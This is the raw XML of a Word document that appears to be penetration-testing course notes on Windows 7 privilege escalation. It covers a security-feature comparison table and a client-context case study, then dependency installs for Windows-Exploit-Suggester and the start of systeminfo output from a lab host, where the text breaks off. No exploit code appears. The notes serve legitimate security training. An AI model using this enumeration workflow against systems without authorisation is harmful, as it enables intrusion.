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A288" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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F6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Windows Desktop Versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140272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pict w14:anchorId="6F1E4ECA">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AE4A6"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Windows 7 was made end-of-life on January 14, 2020, but is still in use in many environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39929A35"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pict w14:anchorId="78C1919E">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832BE4B" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Windows 7 vs. Newer Versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB1152"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Over the years, Microsoft has added enhanced security features to subsequent versions of Windows Desktop. The table below shows some notable differences between Windows 7 and Windows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1201"/>
        <w:gridCol w:w="1336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w14:paraId="1BE6D2BB" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C945AF7" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1272B051" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54E2CD32" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w14:paraId="16EFBC80" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012F0211"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4" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Microsoft Password (MFA)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036EE726"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0A64D49"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054DA23A" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="061F3FF6"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5" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>BitLocker</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77E58273"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3ACA7DEC"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66020DFA" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E55363B"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6" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Credential Guard</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="760E40E2"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BDC1AEF"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08B4170A" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77DF10C6"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7" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Remote Credential Guard</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43937DC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C4D3342"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0BF44DB1" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE4869D"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8" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Device Guard (code integrity)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0D26C6"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C956FF0"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32249ADA" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36552A63"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DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>AppLocker</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C47DC72"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6BE1025D"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0F2A40EB" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41557AC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10" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Windows Defender</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07541F7B"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Partial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41485679"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r w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w14:paraId="343E7E60" w14:textId="77777777" w:rsidTr="00DF6D5F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63092C7E"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hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF6D5F">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>Control Flow Guard</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FCD5A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B9D7FDA"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X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C82FAD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pict w14:anchorId="34FC4C84">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE25BC" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5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F6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Windows 7 Case Study</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A5B0B"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To this date, estimates state that there may be over 100 million users still on Windows 7. According to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DF6D5F">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>NetMarketShare</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, as of November 2020, Windows 7 was the second most used desktop operating system after Windows 10. Windows 7 is standard in large companies across the education, retail, transportation, healthcare, financial, government, and manufacturing sectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75635BE2"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As discussed in the last section, as penetration testers, we must understand our clients' core business, risk appetite, and limitations that may prevent them from entirely moving off all versions of EOL systems such as Windows 7. It is not good enough for us to merely give them a finding for an EOL system with the recommendation of upgrading/decommissioning without any context. We should have ongoing discussions with our clients during our assessments to gain an understanding of their environment. Even if we can attack/escalate privileges on a Windows 7 host, there may be steps that a client can take to limit exposure until they can move off the EOL system(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8D15A"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A large retail client may have Windows 7 embedded devices in 100s of their stores running their point of sale (POS) systems. It may not be financially feasible for them to upgrade them all at once, so we may need to work with them to develop solutions to mitigate the risk. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>large law firm with one old Windows 7 system may be able to upgrade immediately or even remove it from the network. Context is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56146B65"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Let's look at a Windows 7 host that we may uncover in one of the sectors mentioned above. For our Windows 7 target, we can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Sherlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> again like in the Server 2008 example, but let's take a look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DF6D5F">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Windows-Exploit-Suggester</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6868EBB6"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Install Python Dependencies (local VM only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27A625"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This tool works on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Pwnbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, but to get it working on a local version of Parrot, we need to do the following to install the necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DAB0A"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Install Python Dependencies (local VM only) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537710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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8F86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tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> setuptools-2.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F85B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cd setuptools-2.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579919E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python2.7 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27830EF4"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E17949"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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6CCC6"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tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> xlrd-1.0.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A86F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cd xlrd-1.0.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7C28B"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python2.7 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEECB2"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 xml:space="preserve">Gathering </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB23DB"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Once this is done, we need to capture the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> command's output and save it to a text file on our attack VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B80EE" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>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Gathering </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Output </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E101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 xml:space="preserve">C:\htb&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="556B1B57"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0904B73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Host Name:                 WINLPE-WIN7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F688D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OS Name:                   Microsoft Windows 7 Professional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB4B62"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OS Version:                6.1.7601 Service Pack 1 Build 7601</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB7D4C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OS Manufacturer:           Microsoft Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BB362"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OS Configuration:          Standalone Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD9AA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OS Build Type:             Multiprocessor Free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B1FF2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Registered Owner:          mrb3n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795A3E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Registered Organization:</w:t>
      </w:r>
    </w:p>
